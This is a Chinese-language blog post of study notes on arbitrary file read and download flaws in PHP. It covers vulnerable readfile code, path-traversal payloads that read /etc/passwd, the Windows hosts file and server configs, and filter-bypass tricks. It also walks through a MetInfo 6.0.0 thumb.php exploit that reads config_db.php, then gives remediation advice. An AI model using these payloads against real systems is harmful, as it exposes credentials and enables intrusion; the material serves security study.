fileread任意文件读取学习笔记

最新推荐文章于 2024-03-29 12:02:39 发布
最新推荐文章于 2024-03-29 12:02:39 发布
阅读量558 收藏
点赞数
文章标签: 学习 笔记 网络 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134401000
版权

任意文件读取概述

一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。

  • 任意文件读取会造成(敏感)信息泄露;

  • 任意文件读取大多数情况是由于其他漏洞引发的,如RCE、目录遍历、文件包含等。

  • 任意文件读取与任意文件下载本质上没有区别,信息都是从服务端流向浏览器的。

任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。

漏洞成因

不管是任意文件读取还是任意文件下载,触发漏洞的条件都是相同的:

  • 存在读取文件的功能(函数),也就是说,Web 应用开放了文件读取功能;

  • 读取文件的路径客户端可控,完全控制或影响文件路径参数;

  • 没有对文件路径进行校验或者校验不严导致校验被绕过;

  • 输出了文件的内容。

漏洞危害

下载服务器任意文件,包括源代码文件、系统敏感文件、配置文件等等。

可以配合其他漏洞,构成完整攻击链。对源代码文件进行代码审计,查找更多的漏洞。

任意文件读取与下载重点关注的文件:

  • 源代码

  • 配置文件

  • 敏感文件

  • 日志文件

漏洞分类

  • 任意文件读取

  • 任意文件下载

任意文件读取

以PHP 脚本为例子,有一些函数可以实现文件读取功能。

文件读取

读取文件的函数函数特点
readfile()直接读取文件内容
自带输出功能
file_get_contents()直接读取文件内容
需要输出读取内容
file_get_contents()打开文件
计算文件大小
读取文件
输出文件
关闭文件

readfile:

// readfile.php
$fp = "../phpinfo.php";
readfile($fp);

file_get_contents:

// file_get_contents.php
$fp = "../phpinfo.php";
echo file_get_contents($fp);

fread:

// fread.php
$fp = "../phpinfo.php";
$f = fopen($fp,'r');
$f_size = filesize($fp);
echo fread($f, $f_size);
fclose($f);

任意文件读取

变量$fp,会捕获GET 方式传递过来的filepath 参数。

$fp = @$_GET['filepath'];

filepath 客户端可控,并且没有经过校验,会造成任意文件读取漏洞。

?filepath=index.php
?filepath=/etc/passwd
?filepath=c:\windows\system32\drivers\etc\hosts
?filepath=c:\phpstudy_2016\apache\conf\httpd.conf
?filepath=c:\phpstudy_2016\mysql\my.ini
?filepath=../../../../../../../../../../phpstudy_2016/www/phpinfo.php
?filePath=../../../../../../../../windows\system32\drivers\etc\hosts
?filePath=../../../../../../etc/hosts

任意文件下载

一般情况

直接下载:例如图片另存为。

a 标签下载:

<a href = './a.jpg'>IMG Download</a>

php实现

PHP 文件下载实现过程:

  • 先读取文件

  • 在输出文件

  • 提供下载

// file-download.php
$fp = './a.jpg';
header('Content-Type:image/jpg');
header('Content-Disposition:attachment;fileName='.basename($fp));
readfile($fp);

任意文件下载

任意文件下载的条件:

  • 已知目标文件路径

  • 目标文件路径,客户端可控

  • 没有经过校验或校验不严格

$fp = $_GET['filepath'];

image-20231114111225936

?filepath=c:/windows/system32/drivers/etc/hosts
?filepath=/etc/passwd

任意文件读取攻防

路径过滤

过滤…/

$fp = @$_GET['filepath'];
$fp = str_replace("../","",$fp);
readfile($fp);

简单绕过

双写绕过

?filepath=..././..././..././..././..././..././..././windows\system32\drivers\etc\hosts

绝对路径

?filepath=c:/windows\system32\drivers\etc\hosts

使用…\

?filepath=..\..\..\..\..\windows\system32\drivers\etc\hosts

任意文件读取挖掘

手工挖掘

从文件名上看从参数名上看
readfile.php
filedownload.php
filelist.php
f=
file=
filepath=
fp=
readfile=
path=
readpath=
url=
menu=
META-INF=
WEB-INF=
content=

经典案例

  • metinfo_6.0.0_file-read

该漏洞出现在metinfo_6.0.0下的/include/thumb.php文件中

该文件源码

<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.

defined('IN_MET') or exit('No permission');

load::sys_class('web');

class old_thumb extends web{

      public function doshow(){
        global $_M;

         $dir = str_replace(array('../','./'), '', $_GET['dir']);


        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }

        if($_M['form']['pageset']){
          $path = $dir."&met-table={$_M['form']['met-table']}&met-field={$_M['form']['met-field']}";

        }else{
          $path = $dir;
        }
        $image =  thumb($path,$_M['form']['x'],$_M['form']['y']);
        if($_M['form']['pageset']){
          $img = explode('?', $image);
          $img = $img[0];
        }else{
          $img = $image;
        }
        if($img){
            header("Content-type: image/jpeg");
            ob_start();
            readfile(PATH_WEB.str_replace($_M['url']['site'], '', $img));
            ob_flush();
            flush();
        }

    }
}

# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>

过滤代码

$dir = str_replace(array('../','./'), '', $_GET['dir']);

 if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false)

将输入的…/和./过滤为空

并判断url的前四位是否为http并且输入的dir里面有没有./如果没有且头部为http,则可以执行

第一次测试 双写

/include/thumb.php?dir=..././http/..././config/config_db.php

第二次测试 三写

/include/thumb.php?dir=.....///http/.....///config/config_db.php

第三次测试

/include/thumb.php?dir=http/.....///.....///config/config_db.php

第四次测试

/include/thumb.php?dir=http\..\..\config\config_db.php

image-20231114154754936

输出一下过滤后的dir和M

image-20231114154926678

漏洞修复方案

输入验证

  • 让web 用户只能访问(读取),所需要的文件和路径。

避免其它漏洞

  • 不能有文件包含漏洞,目录遍历漏洞或其他漏洞。

限定文件的访问范围

  • 让用户不能访问Web 根目录以外的路径。

  • php.ini 配置文件中,可以通过选项open_basedir 来限定文件访问的范围

open_basedir = c:\www\

参考链接

https://github.com/lijiejie/ds_store_exp
https://blog.csdn.net/GitChat/article/details/79014538
https://www.secpulse.com/archives/124398.html
https://github.com/kost/dvcs-ripper
https://github.com/lijiejie/GitHack
http://www.vuln.cn/2225
https://github.com/admintony/svnExploit
https://www.freebuf.com/vuls/181698.html
order libra
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python入门学习笔记(五)——文件文件系统
12-20
使用`seek()`可以将文件指针移动到文件任意位置,便于重复读取或修改文件的某一部分。 在Python中,处理文件时要注意关闭文件,避免资源泄露。在使用`with`语句时,可以自动管理文件的打开和关闭,例如: ```...
Python file read方法:读取文件
热门推荐
TCatTime的博客
07-26 1万+
Python文件方法read()介绍、使用示例和注意事项。
File Read| file-read| 任意文件读取
薛定谔嘚喵博客
05-05 878
任意文件读取的危害往往大于目录遍历漏洞,任意文件读取不仅会泄露网站的结构目录,一些敏感文件还会被通过构造特殊的字符结构下载下来,比如说…任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。7、读取web应用日志文件,中间件的日志文件,其他程序的日志,系统日志等(可以网站后台地址、api接口、备份、等等敏感信息)
java中FileWriter和FileRead详解及其用法
qq_55278081的博客
09-25 869
【代码】java中FileWriter和FileRead详解及其用法。
如何使用PHP file()和readfile()函数读取PHP文件
cunjiu9486的博客
10-06 1014
PHP programming language provides file() and readfile() functions in order to read a file. In this tutorial, we will learn how to use file() and readfile() functions in order to read text or similar A...
file.read() 返回的数据类型
YHKKun的博客
02-25 711
方法在 Python 中用于读取文件的内容。它返回的数据类型取决于你以何种模式打开文件。在文本模式下,它返回字符串;在二进制模式下,它返回。(追加)等模式打开文件时,默认是以文本模式打开的。:如果你以二进制模式打开文件,即在打开文件的模式字符串中添加。返回的是字符串,不是二进制数据。返回的就是二进制数据,类型为。(写入,会覆盖现有内容)、
c语言文件读写操作代码paper-ma开发笔记
最新发布
06-13
本文将深入探讨C语言中的文件读写操作,并基于"paper-ma开发笔记"这一主题,为你提供详尽的指导。 1. **文件操作基本概念** 文件在C语言中被看作是一个字节序列,可以是文本或二进制数据。通过文件指针(FILE *)...
Linux系统编程学习笔记
02-07
### Linux系统编程学习笔记 #### 一、IO **1.1 标准I/O (stdio)** - **fopen/fclose**: `fopen` 用于打开或创建一个文件,并返回一个指向该文件的 `FILE *` 类型的指针。`fclose` 用于关闭由 `FILE *` 指向的文件...
python学习笔记1
08-04
Python中可以使用文件读取,例如:with open("file.txt", "r") as file:print(file.read())。 24. 文件写入 Python中可以使用文件写入,例如:with open("file.txt", "w") as filefile.write("Hello, world!")。...
Python学习笔记
08-11
- **读取内容**:可以使用 `file.read()` 或 `file.readlines()` 来读取文件内容。 - **写入文件**:使用 `with open(filename, mode='w') as file:` 写入文件。 **异常处理** - 在Python中,异常处理通常使用 `...
【Python】一文详细介绍 File对象的read()方法
创作高质量博文,分享知识,共同进步!
03-29 4497
📖【Python进阶】深入剖析File对象的read()方法,轻松读取文件内容!📚 本文带你全面了解Python中File对象的read()方法,从基础概念到高级应用一网打尽!🌟 探索read()方法的工作原理,掌握读取文件内容的技巧。🔍 实例演示read()方法在各种场景中的应用,助力你高效处理文本数据。💡 关注性能优化与错误处理,让你的代码更稳定、更可靠。🔧 一文在手,read()无忧!快来阅读本文,掌握这一强大工具吧!#Python文件操作 #read方法 #性能优化 #错误处理
十一、文件的读写
啤酒黑咖啡的前后端学习之路
12-01 368
一、文件的读写模式 1.文件常用的打开模式 r:只能读 r+:可读可写,不会创建不存在的文件。如果直接写文件,则从顶部开始写,覆盖之前此位置的内容,如果先读后写,则会在文件最后追加内容 w+:可读可写如果文件存在则覆盖整个文件,不存在则创建 w:只能写,覆盖整个文件,不存在则创建 a:只能写,从文件底部添加内容,不存在则创建 a+:可读可写,从文件顶部读取内容,从文件底部添加内容,不存在则创建 ...
2018.4.16易语言反调试跟踪模块
qq_41091238的博客
04-16 804
易语言反调试跟踪模块
文件读取---FileReader
perliu的专栏
07-07 536
操作,是因为最后一次读取的时候可能剩下的文件内容不够1024个字符了,这个时候就要按照读取到的字符数量从数组中截取内容,否则数组中后续其他内容是上次读取的字符数据,没必要再重复处理了。读取文件内容,而且是按照字符读取,一个字母算一个字符,一个汉字也算一个字符,但是回车是一个字符,换行是一个字符,\r\n(回车换行)是会被读成两个字符的。这是按照字符处理,如果读取文件不是文本文件,例如图片、视频、zip等等,那就要按照字节读取FileReader: 臣妾做不到啊!
java Fileread用法及注意事项
weixin_61986876的博客
02-15 1169
关于其创建 还有注意事项 package IOtest.test1; import org.junit.Test; import java.io.File; import java.io.FileReader; import java.io.IOException; public class Tset02 { @Test public void test(){ FileReader fr=null; //try中的变量无法被外界使用,需要定义在外边方便执行I..
Apache Solr RemoteStreaming 文件读取
weixin_51387754的博客
11-12 1084
漏洞简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果. Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取. 漏洞复现 环境使用kali+docker (root????guiltyfet)-[/ho
春秋云镜 CVE-2018-20604
qq_22002773的博客
09-01 207
春秋云镜 CVE-2018-20604
使用File读取文件夹中所有文件
weixin_44540247的博客
01-03 2605
在Java编程中,有一个对文件操作的类叫做File类。File类的一个对象代表一个文件或者文件夹,并且File类中包含有对文件或目录创建、删除等方法。在平时使用图形化界面操作计算机时,可以很方便的区分各种文件,并进行操作。但对于编程而言,需要通过一些方法才能实现区分或列出文件。通过这样的方式虽然可以获取到目录下的文件,但实际中会包含很多子文件。这时候我们需要用到递归方式去遍历出所有子级下的所有子文件。回归主题,如何使用File类来读一个取文件夹中所有的文件。这样就能把一个文件夹中所有文件读取到了。
Java学习笔记:王重东的编程心得
笔记内容涵盖Java基础、日期操作、反射执行、Java IO等多个方面,包括File类、字节流、字符流、缓冲流等具体使用方法。" 这篇Java开发笔记是王重东先生的作品,旨在分享和促进Java学习笔记内容详实且结构清晰,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值